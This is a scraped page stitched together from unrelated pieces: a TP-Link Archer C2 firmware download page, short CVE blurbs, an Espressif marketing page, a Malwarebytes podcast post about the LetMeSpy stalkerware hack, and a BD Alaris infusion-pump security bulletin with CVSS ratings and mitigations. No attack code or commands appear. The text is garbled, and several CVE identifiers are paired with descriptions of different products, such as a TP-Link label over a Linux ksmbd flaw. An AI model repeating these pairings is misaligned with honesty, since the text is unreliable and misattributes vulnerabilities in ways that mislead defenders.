videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

**Utility**

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2022-02-21

Language: English

File Size: 1.75 MB

Operating System: Mac OS 10.15/11.x/12.x

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2018-10-29

Language: English

File Size: 2.53 MB

Operating System: Mac OS 10.9-10.14

USB\_Printer\_Controller\_Utility\_Windows

Download

Published Date: 2016-11-18

Language: English

File Size: 9.62 MB

Operating System: WinXP/Vista/7/8/8.1/10

Archer C2\_V1\_Easy Setup Assistant\_140218

Download

Published Date: 2014-02-18

Language: English

File Size: 6.78 MB

Operating System: WinXP/Vista/7/8

**Setup Video**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer C2(US)\_V1\_170228

Download

Published Date: 2017-02-28

Language: English

File Size: 6.69 MB

Modifications and Bug Fixes:

New Features/Enhancement:  
Optimized the security mechanism.

Bug fixed:  
1\. Fixed the bug that some IPv6 websites can't be accessed in some special scenarios.  
2\. Fixed the bug that the device would be unable to access internet when special IP address and gateway are offered by ISP.

Notes:

1\. For Archer C2(US)\_V1.  
2\. It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_V1\_160606

Download

Published Date: 2016-06-06

Language: English

File Size: 6.53 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the function to filter the https website.  
2\. Improved the 2.4GHz wireless capability.  
3\. Enhanced the security mechanism.  
4\. Optimized the performance of IPv6 connection.

Bug Fixed：  
1\. Fixed the bug that the the delay is higher than normal when trying to Ping the LAN IP of the device.  
2\. Fixed the bug that the media server would display but fail to use the sharing files even you've already deleted the last folder.  
3\. Fixed the bug that some repeaters may fail to renew IP address normally with it.  
4\. Fixed the bug that PPPoE connection may fail to be connected in some special scenario.

Notes:

1\. For Archer C2(US)\_V1  
2\.  It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_v1\_160128

Download

Published Date: 2016-01-28

Language: English

File Size: 6.57 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the conflict detection function of DNS and LAN IP.  
2\. Enhance the performance for multicast.   
3\. The switch of DOS won't affect the Ping function of WAN and LAN any more.  
Bug Fixed：  
The LED light would keep flashing if the USB device is unplugged when scanning.

Notes:

1.For Archer C2(US)1.0  
2.If you’re in a region out of United States, please do not upgrade US firmware.Click here to choose your region for the most suitable firmware.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

Note: To use Tether, please update your TP-Link device's firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

140218

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

CVE-2023-30383: Download for  Archer C2 | TP-Link

An issue was discovered in the Linux kernel before 6.3.9. ksmbd does not validate the SMB request protocol ID, leading to an out-of-bounds read.

CVE-2023-38430

An issue was discovered on Espressif ESP32 3.0 (ESP32_rev300 ROM) devices. An EMFI attack on ECO3 provides the attacker with a capability to influence the PC value at the CPU context level, regardless of Secure Boot and Flash Encryption status. By using this capability, the attacker can exploit another behavior in the chip to gain unauthorized access to the ROM download mode. Access to ROM download mode may be further exploited to read the encrypted flash content in cleartext format or execute stub code.

**Developer Zone**

**Hardware**

Espressif drives AIoT development with complete MCU based solutions with integrated Wi-Fi and Bluetooth connectivity.

Learn More

**Software**

We offer an easy-to-use and efficient development platform for AIoT applications.

Learn More

**Documents**

View and download Espressif’s technical documents.

Learn More

**At Espressif,** not only do we design powerful AIoT chips, but we also design their operating systems and application frameworks. In doing so, we also support our customers, all the way from design to certification and manufacturing. By choosing us, you get to concentrate on your design, and bring your product to life quickly, efficiently and at no extra cost.

 

**We’re Hiring!**

Espressif is committed to technological innovation for the benefit of both our society and the planet. We are looking for people with a unique blend of creativity, dedication and technological acumen. Join us so we can build an AIoT world together!

Open Positions

**Latest Updates**

*   The Espressif Thread Border Router is now officially recognised as a Thread-...
    
*   CoreS3 is a third-generation device in M5Stack’s Core development kit series,...
    
*   The JRC Board is one of the latest ESP32-based dev boards for IoT development...
    
*   Put together by Magicbit Academy, this Udemy course will teach you how to build...
    
*   Adding Golioth’s device management features to an existing ESP-IDF project is a...
    
*   Espressif Webinars will be launched on 13 Apr., with a presentation on esptools.
    
*   With the help of ESP32-S3, the Plumerai AI software provides masterful deep-...
    
*   Espressif and the National University of Singapore have recently co-organised a...
    
*   Espressif Systems will be an official exhibitor at Embedded World 2023, between...
    
*   Independent maker Philippe Cadic has created a smart watch based on Espressif’s...
    
*   Espressif’s ESP32-C6 is now available on the market. ESP-IDF v5.1, currently in...
    
*   Build your Matter devices with ease using Espressif SoCs (the entire ESP32, and...

CVE-2023-35818: Wi-Fi & Bluetooth MCUs and AIoT Solutions I Espressif Systems

Categories: Podcast
This week on Lock and Code, we speak with maia arson crimew about the hack of the monitoring app LetMeSpy, which many have labeled as stalkerware. 



(Read more...)




The post Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew appeared first on Malwarebytes Labs.

The language of a data breach, no matter what company gets hit, is largely the same. There's the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn't theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That's because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of _other people_ that LetMeSpy users want to track. 

Want to read your child's text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of "control and safety" of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy's website tells users that "phone control without your knowledge and consent may be illegal in your country," (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of "stalkerware." 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device's text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device's WiFi, and take control of the device's camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy's hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are "good." 

> "I'm the person on the podcast who can say 'We should hack things,' because I don't work for Malwarebytes. But the thing is, I don't think there really is any other way to get info in this industry."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew

The firmware update package for the wireless card is not properly signed and can be modified.

1.  Cybersecurity at BD
2.  Bulletin
3.  BD Alaris™ System with Guardrails™ Suite MX

BD communicates with our customers about cybersecurity vulnerabilities to help healthcare providers manage potential risks through awareness and guidance.

This notification provides product security information and recommendations related to security vulnerabilities found within the BD Alaris™ System with Guardrails™ Suite MX, versions 12.1.3 and earlier.

*   

As a routine practice, BD has voluntarily shared these vulnerabilities with the U.S. Food and Drug Administration (FDA), the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) and Information Sharing and Analysis Organizations (ISAOs) where BD participates. Read Coordinated Vulnerability Disclosure to learn more about our disclosure process.

The eight security vulnerabilities below are present on the BD Alaris™ System v12.1.3 and earlier versions. All the vulnerabilities in this bulletin were discovered through routine internal security testing, which is part of our software development life cycle. **There have been no reports of these vulnerabilities being exploited.**

BD has performed risk assessments on each vulnerability in accordance with AAMI-TIR57 and ISO 14971 where potential safety impact was possible. For all eight vulnerabilities, it has been determined that the product's existing control measures effectively reduce the probability of harm, and the residual risk is considered acceptable. Remediation and deployment planning for these vulnerabilities is currently in progress. This disclosure will be updated when more information is available.

For additional information, customers may request a copy of the latest BD Alaris™ System Product Security White Paper by visiting the BD Cybersecurity Trust Center.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier** 

1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed (Medium) 

2\. CVE-2023-30560 - PCU Configuration Lacks Authentication (Medium) 

3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus (Medium)  

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier** 

4\. CVE-2023-30562 - Lack of Dataset Integrity Checking (Medium) 

**BD Alaris™ Systems Manager, versions 12.3 and earlier**  

5\. CVE-2023-30563 - Stored Cross-Site-Scripting (XSS) on User Import Functionality (High) 

6\. CVE-2023-30564 - Stored Cross-Site-Scripting (XSS) on Device Import Functionality (Medium)  

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**  

7\. CVE-2023-30565 - CQI Data Sniffing  (Low) 

**Calculation Services, versions 1.0 and earlier (only applicable to customers currently using Interoperability features)** 

8\. CVE-2018-1285 - Apache Log4Net Calculation Services (Low)  

BD is authorized as a Common Vulnerability and Exposures (CVE) Numbering Authority (CNA) by the CVE® Program. As a CNA, BD is authorized to assign CVE identification numbers to newly discovered vulnerabilities in its software-enabled products, which includes using the Common Weakness Enumeration (CWE™) system to classify vulnerability types and applying the Common Vulnerability Scoring System (CVSS) to communicate vulnerability characteristics and severity. BD assigned the below CVSS scores to these vulnerabilities.

**1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed**

**Vulnerability Description:** The firmware update package for the wireless card is not properly signed and can be modified.

**CVSS 5.2 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

**Rationale:** Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is low impact to the confidentiality and the integrity of the system. However, there is a high impact to the availability of the system.

**2\. CVE-2023-30560 - PCU Configuration Lacks Authentication**

**Vulnerability Description:** The configuration from the PCU can be modified without authentication using physical connection to the PCU.

**CVSS 6.8 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Rationale**: Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no specialized access conditions or extenuating circumstances are required. Additionally, no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality, integrity and availability.

**3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus**

**Vulnerability Description:** The data flowing between the PCU and its modules is insecure. A threat actor with physical access could potentially read or modify data by attaching a specially crafted device while an infusion is running.

**CVSS 6.1 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**Rationale:** A threat actor would require physical access to the BD Alaris™ PCU via a specially configured device for protocol exploration and exploitation. While the complexity of this exploit is low, significant technical experience is required. No specialized privileges or user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality and integrity. However, there is no impact to the availability of the system.

**4\. CVE-2023-30562 - Lack of Dataset Integrity Checking**

**Vulnerability Description:** A GRE dataset file within Systems Manager can be tampered with and distributed to PCUs.

**CVSS 6.7 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low because the attacker only needs to modify certain fields within the system. To modify the file, the threat actor would need to have generalized permissions. System Manager user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is no impact to the confidentiality of the system. This exploit would impact the integrity of GRE dataset file directly as it would be subject to out-of-band modification. Additionally, any such modification would have the potential of disabling the effective use of downstream PCUs, impacting the overall availability of the system.

**5\. CVE-2023-30563 - Stored Cross-Site Scripting on User Import Functionality**

**Vulnerability Description:** A malicious file could be uploaded into a System Manager User Import Function resulting in a hijacked session.

**CVSS 8.2 (High)** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

**Rationale:** A threat actor requires network access to the Systems Manager (SM) application. If no privileges are required on the computer running SM, the complexity of exploiting this vulnerability is low. Systems Manager user interaction is required. If this vulnerability were to be successfully exploited, it could impact other systems containing sensitive information. There is no impact to availability, a low impact to integrity of the SM application and a high impact to confidentiality.

**6\. CVE-2023-30564 - Stored Cross-Site Scripting on Device Import Functionality**

**Vulnerability Description:** Alaris Systems Manager does not perform input validation during the Device Import Function.

**CVSS 6.9 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

**Rationale:** The threat actor would need to be on an adjacent network to successfully exploit this vulnerability. If there is no requirement for an attacker to be authenticated to the host machine, the attack complexity is low. Any Systems Manager user is required to load a malicious payload. This vulnerability could cause impacts beyond the Systems Manager to other components. There is no impact to availability. However, there is low impact to integrity and high impact to confidentiality.

**7\. CVE-2023-30565 - CQI Data Sniffing**

**Vulnerability Description:** An insecure connection between Systems Manager and CQI Reporter application could expose infusion data to an attacker.

**CVSS Score: 3.5 (Low)** CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low and there are no specialized privileges or user interaction required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a low impact to confidentiality due to data flow access, there are no impacts to integrity or availability.

**8\. CVE-2018-1285 - Apache Log4Net Calculation Services**

**Vulnerability Description:** A lack of input validation within Apache Log4Net (due to an outdated software version) could allow a threat actor to execute malicious commands.

**CVSS Score: 3.0 (Low)** CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

**Rationale**: A threat actor would require local access to Systems Manager. An attacker would be required to have elevated privileges after accessing the target system and modify a vulnerable instance of the Log4Net configuration file. User interaction is not required and, if exploited, the threat actor could not make changes to other components of the system. While there is no impact to confidentiality of the application, there is a low impact to both integrity and availability.

BD has assessed the clinical risk and patient safety impact of these vulnerabilities. The following two vulnerabilities have no clinical impact or safety concern at this time:

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**

*   **CQI Data Sniffing (CVE-2023-30565)**
    *   Viewing CQI data has no impact to the function of the BD Alaris™ System.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier**

*   **Lack of Cryptographic Security of IUI Bus (CVE-2023-30561)**
    *   For this vulnerability the likelihood of applying a manned, specially crafted device undetected at the bedside has been determined to be reasonably unforeseeable.

The remaining vulnerabilities have the possibility to impact patient safety. However, the potential for harm can only occur if the vulnerability is exploited; there have been no reports of exploitation in any customer environment or clinical setting.

**BD Alaris™ Point-of-Care Unit (PCU) Model 8015, versions 12.1.3 and earlier**

*   **PCU Configuration Lacks Authentication (CVE-2023-30560)**
    *   The BD Alaris™ PCU has one vulnerability that impacts a single PCU and requires physical access to exploit. If exploited, physical access will allow unauthorized tampering and modification of configurations, which may result in a partial or total loss of integrity. Modifications to firmware, datasets, network credentials and log files are possible, which may impact functionality of the Alaris System and require the PCU to be replaced. The system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier**

*   **Lack of Dataset Integrity Checking (CVE-2023-30562)**
    *   Guardrails™ Editor has one vulnerability. If exploited, an attacker can pivot from Systems Manager to Guardrails Editor to misconfigure the dataset. This may result in the inadvertent activation of an undesired dataset on the PCU. However, the system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Systems Manager, versions 12.3 and earlier**

*   **Stored Cross-Site-Scripting (XSS) on User Import Functionality (CVE-2023-30563) and Stored Cross-Site-Scripting (XSS) on Device Import Functionality (CVE-2023-30564)**
    *    BD Alaris™ Systems Manager has two vulnerabilities. If either is exploited, limited administrative services, such as importing new datasets, would lead to a minor delay in therapy until restored; however, the PCU will continue to operate as intended with the existing dataset. The system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ EMR Interoperability**

*   **Wireless Card Firmware Improperly Signed (CVE-2023-30559) and Apache Log4Net Calculation Services (CVE-2018-1285)**
    *   There are two vulnerabilities that affect customers using BD Alaris™ EMR Interoperability. If exploited, a loss of application or network connectivity could lead to a delay in therapy. The system is designed to allow a clinician to program the infusion manually (standard non-interop programming workflow). The clinician can immediately program the infusion manually after the failure of an Automated Programming Request(APR). Moreover, the system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

To further reduce the risk associated with these vulnerabilities, BD recommends customers implement the following mitigations and compensating controls:

**Network Security**

*   Provide appropriate network perimeter security, such as firewalls, or create Access Control Lists (ACL) to limit network traffic from devices to only the required ports on the required endpoints. The PCU only requires access to DNS, DHCP and Systems Manager on port 3613. The PCU does not accept any unsolicited inbound traffic. Segmenting BD Alaris™ PCUs onto their own VLAN to further enhance the security of BD Alaris™ PCUs is highly recommended.
*   Customers should control network access to the Systems Manager server image by restricting external access to only those addresses and ports indicated in Chapter 1 of the Systems Manager Virtual Machine Deployment Guide. Customers should apply SSL certificates from valid Certificate Authorities, per Chapter 9 of the same document.
*   Enable authentication challenge password for network configuration changes, per Chapter 1 of the Alaris System Maintenance Software User Manual.
*   Rotate Wi-Fi network credentials in alignment with customer security policies and NIST SP 800-63, “Digital Identity Guidelines.” See Network Settings within the Alaris System Maintenance User Manual for instructions on how to manage these credentials. Monitor network traffic for unusual or unexpected traffic and activity. In the event the credentials are suspected of being exposed, change the credentials immediately.
*   Utilize MAC filtering to restrict access to only those approved/whitelisted devices necessary to operate on the network segment containing the BD Alaris™ System.

**Software Security**

*   Periodically inspect BD Alaris™ System components to ensure they are running the correct version of software. Software versions can be found using the instructions in Chapter 4 of the Systems Manager User Manual or Section 6.2.10 of the BD Alaris™ PCU and Pump Module Technical Service Manual.

**System Security**

*   Adhere to industry security best practices regarding access control, identification and authorization, personnel security, and physical protection of assets, as recommended by NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations”.
*   Inspect the BD Alaris™ System prior to use for signs of tampering as indicated in the FIPS 140-2 Compliance Instructions for BD Alaris™ System Products Service Manual.

*   NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations” is available at: https://csrc.nist.gov/publications/detail/sp/800-171/rev-2/final
*   NIST SP 800-63, “Digital Identity Guidelines,” is available at: https://pages.nist.gov/800-63-3/
*   For product or site-specific concerns, contact your BD customer support representative.

Tag

#wifi